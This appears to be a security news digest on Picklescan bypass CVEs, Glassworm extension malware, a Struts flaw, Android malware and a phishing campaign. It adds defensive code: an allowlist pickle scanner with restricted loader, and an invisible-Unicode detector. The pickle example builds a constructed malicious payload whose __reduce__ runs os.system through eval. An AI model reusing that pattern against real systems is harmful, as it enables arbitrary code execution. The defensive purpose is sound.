Three critical vulnerabilities were discovered in Picklescan, a security scanner for Python pickle files, allowing malicious actors to execute arbitrary code by bypassing its detection mechanisms. The vulnerabilities (CVE-2025-10155, CVE-2025-10156, CVE-2025-10157) include file extension bypass, CRC error exploitation, and unsafe globals check circumvention, enabling attackers to execute malicious code and potentially launch supply chain attacks. A separate vulnerability (CVE-2025-46417) was found, allowing malicious pickle files to exfiltrate sensitive information via DNS, exploiting legitimate Python modules like linecache and ssl.
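The picklescan findings above share a root cause: a pickle is a program, and a denylist scanner has to anticipate every way that program can reach a dangerous callable, including through modules that are legitimate on their own (as the DNS exfiltration via linecache and ssl shows). The example below is added here and is not picklescan's code; it demonstrates the inverse approach, an allowlist applied twice. A static pass walks the opcode stream with pickletools.genops (no code runs) and lists every global the pickle would import; then a restricted unpickler enforces the same allowlist at load time, so a pattern the scanner missed is still refused. The allowlist, the model-like payload and the malicious sample (a `__reduce__` that targets builtins.eval) are constructed; the string it carries is never evaluated.

```python
"""Allowlist-based pickle inspection: static opcode scan plus a restricted loader.

Added example, not picklescan's code. The allowlist and the sample payload are constructed.
"""
import io
import pickle
import pickletools
from typing import List, Tuple

# Globals a given model format legitimately needs. Anything else is refused, so
# "legitimate" modules (linecache, ssl, ...) are blocked without being enumerated.
SAFE_GLOBALS = {
    ("builtins", "set"),
    ("collections", "OrderedDict"),
}

STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def referenced_globals(data: bytes) -> List[Tuple[str, str]]:
    """List every module.name import the pickle would perform, without executing it.

    GLOBAL carries "module name" inline; STACK_GLOBAL (protocol 4+) takes the two
    strings pushed before it. Tracking the last two string pushes is enough for
    pickler output but not for hand-crafted streams that reuse strings through
    MEMOIZE/BINGET, which a production scanner must also resolve.
    """
    found, recent = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL" and len(recent) >= 2:
            found.append((recent[-2], recent[-1]))
        elif op.name in STRING_OPS:
            recent.append(arg)
    return found


def is_safe(data: bytes) -> Tuple[bool, List[Tuple[str, str]]]:
    """(True, []) if every referenced global is allowlisted, else (False, offenders)."""
    offenders = [g for g in referenced_globals(data) if g not in SAFE_GLOBALS]
    return (not offenders, offenders)


class RestrictedUnpickler(pickle.Unpickler):
    """Enforces the same allowlist at load time, independent of the static scan."""

    def find_class(self, module: str, name: str):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def load_is_blocked(data: bytes) -> bool:
    """True if the restricted loader refuses the stream."""
    try:
        restricted_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


class _CallsEval:
    """Constructed payload: __reduce__ makes the pickle call builtins.eval on load.
    The string is never evaluated here because both defences refuse the import."""

    def __reduce__(self):
        return (eval, ("__import__('os').system('echo pwned')",))


MALICIOUS = pickle.dumps(_CallsEval(), protocol=4)
BENIGN = pickle.dumps({"weights": [0.5, 0.25], "labels": {"cat", "dog"}}, protocol=4)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, is_safe(blob), "blocked at load:", load_is_blocked(blob))
```

The static pass is what a scanner like picklescan does and is useful for triage at scale; the restricted loader is the control that actually holds when the scanner is wrong, because find_class is consulted for every import the stream performs, however it was encoded.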
The Glassworm malware has resurfaced in its third wave, introducing 24 new malicious packages on Open VSX and the Visual Studio Marketplace. Initially detected in October, Glassworm uses invisible Unicode characters to conceal its code and targets developers by stealing credentials for GitHub, npm, and Open VSX accounts, as well as cryptocurrency wallet data. It also establishes a SOCKS proxy for routing malicious traffic and installs an HVNC client for remote access. Despite previous containment efforts, the malware returned with new extensions and publisher accounts, targeting popular frameworks like Flutter and React Native. The latest wave shows an evolution in technical capability, now using Rust-based implants while continuing to manipulate download counts to appear trustworthy and confuse users in search results.
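Code hidden behind invisible Unicode characters survives review because the editor shows nothing where the characters are. The scanner below is an added example, not Koi's or the marketplaces' tooling, and is written for this kind of audit: it reports every line of a source file containing format characters (category Cf, which covers zero-width spaces and bidi controls) plus a hand-picked set of invisible non-Cf code points (variation selectors and Hangul fillers), and can strip them so a reviewer can compare what is visible against what is on disk. The code-point set is a general-purpose assumption, not the exact characters Glassworm uses; the sample extension source is constructed.

```python
"""Find characters that render as nothing in a source file.

Added example, not Koi's or the marketplaces' tooling. The code-point set below is a
general one (format characters, variation selectors, Hangul fillers, bidi controls),
an assumption rather than the exact characters Glassworm uses. The sample is constructed.
"""
import unicodedata
from typing import Dict, List

# Invisible characters that unicodedata does not classify as format (Cf).
EXTRA_INVISIBLE = (
    {0x115F, 0x1160, 0x3164, 0xFFA0}              # Hangul fillers
    | set(range(0xFE00, 0xFE10))                  # variation selectors 1-16
    | set(range(0xE0100, 0xE01F0))                # variation selectors 17-256
)
BOM = "\ufeff"  # a byte order mark at the very start of a file is normal, elsewhere it is not


def is_invisible(ch: str) -> bool:
    return ord(ch) in EXTRA_INVISIBLE or unicodedata.category(ch) == "Cf"


def scan_source(text: str, path: str = "<input>") -> List[Dict[str, object]]:
    """One finding per affected line, with column, code point and name of each hit."""
    if text.startswith(BOM):
        text = text[1:]
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        hits = [
            (col, f"U+{ord(c):04X}", unicodedata.name(c, "<unnamed>"))
            for col, c in enumerate(line, 1)
            if is_invisible(c)
        ]
        if hits:
            findings.append({"path": path, "line": lineno, "count": len(hits), "chars": hits})
    return findings


def visible_only(text: str) -> str:
    """What a reviewer actually sees; the length difference against the raw file is the hidden budget."""
    return "".join(c for c in text if not is_invisible(c))


# Constructed sample: a harmless-looking extension entry point with zero-width
# characters padding line 1 and a Hangul filler (renders like a space) on line 3.
SAMPLE = (
    "\ufeff"
    "const version = '1.2.0';\u200b\u200b\u200b\ufe0f\n"
    "module.exports = { activate() {} };\n"
    "\u3164require('./telemetry');\n"
)

if __name__ == "__main__":
    for finding in scan_source(SAMPLE, "extension.js"):
        print(finding)
    print("hidden characters:", len(SAMPLE) - len(visible_only(SAMPLE)))
```

Run over a package before publishing or installing, a non-zero hidden budget on any line that is not a string literal with a documented reason is grounds to reject it; a real campaign encodes a whole payload this way, so the counts are large rather than the handful shown here.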
A critical vulnerability, tracked as CVE-2025-64775, has been discovered in Apache Struts, a popular open-source web application framework. This flaw enables attackers to exploit improper cleanup of temporary files during multipart requests, potentially leading to disk exhaustion attacks. By generating numerous large temporary files, an attacker can fill a server’s disk space, causing significant disruptions such as slow performance or complete unavailability of the application. The vulnerability affects several versions of Struts, including those that are no longer supported.
A new Android malware named Albiriox has emerged, operating under a MaaS model to facilitate on-device fraud and screen manipulation across over 400 applications, including banking and cryptocurrency platforms. Distributed through social engineering tactics, Albiriox employs dropper applications and advanced packing techniques to evade detection. It uses accessibility services to bypass Android's security measures, enabling attackers to conduct credential theft and manipulate device screens without raising alarms. Additionally, it executes overlay attacks and utilizes fake websites to lure victims into downloading malicious APKs.
Operation Hanoi Thief is a sophisticated cyber-espionage campaign targeting Vietnam's technology and recruitment sectors. It employs spear-phishing tactics through a malicious email containing a ZIP file disguised as a job applicant's CV. This ZIP file includes a pseudo-polyglot payload—a combination of an image, a PDF document, and a malicious script—designed to deceive victims. When the LNK file is executed, it triggers a legitimate Windows tool, ftp.exe, to run hidden commands, ultimately extracting a Base64 encoded blob that decodes into the LOTUSHARVEST malware. This information stealer targets browser data from Google Chrome and Microsoft Edge, exfiltrating sensitive information to attacker-controlled domains.